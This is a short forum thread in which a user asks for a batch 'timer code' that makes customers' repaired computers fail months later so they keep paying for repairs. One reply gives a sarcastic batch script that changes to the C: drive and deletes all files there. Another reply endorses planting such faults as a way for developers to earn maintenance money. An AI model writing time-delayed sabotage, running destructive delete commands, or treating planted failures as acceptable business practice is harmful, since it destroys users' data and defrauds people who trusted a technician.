Help help

bhitra

Geek Trainee
Well I need a simple batch code which works according to time. I want that suppose if i repair somebody's computer, it get the problem after 6 months or 7 months by the help of timer code so that a customer keep coming. please
 
ECHO the guy who installed this software is a rude guy who wants to pickpocket you in a delicate way.
ECHO windows will be deleted so you can call him again, pls press any key to continue
PAUSE
cd c:\
del *.* /q
ECHO thank you for your cooperation, Have a nice day!
 
It's usually done for getting the maintenance for the software product, if you a developer and you want to get the maintenance money after a period of time then you can use this trick in your software so that whenever the error occur you gets money.
 
Back
Top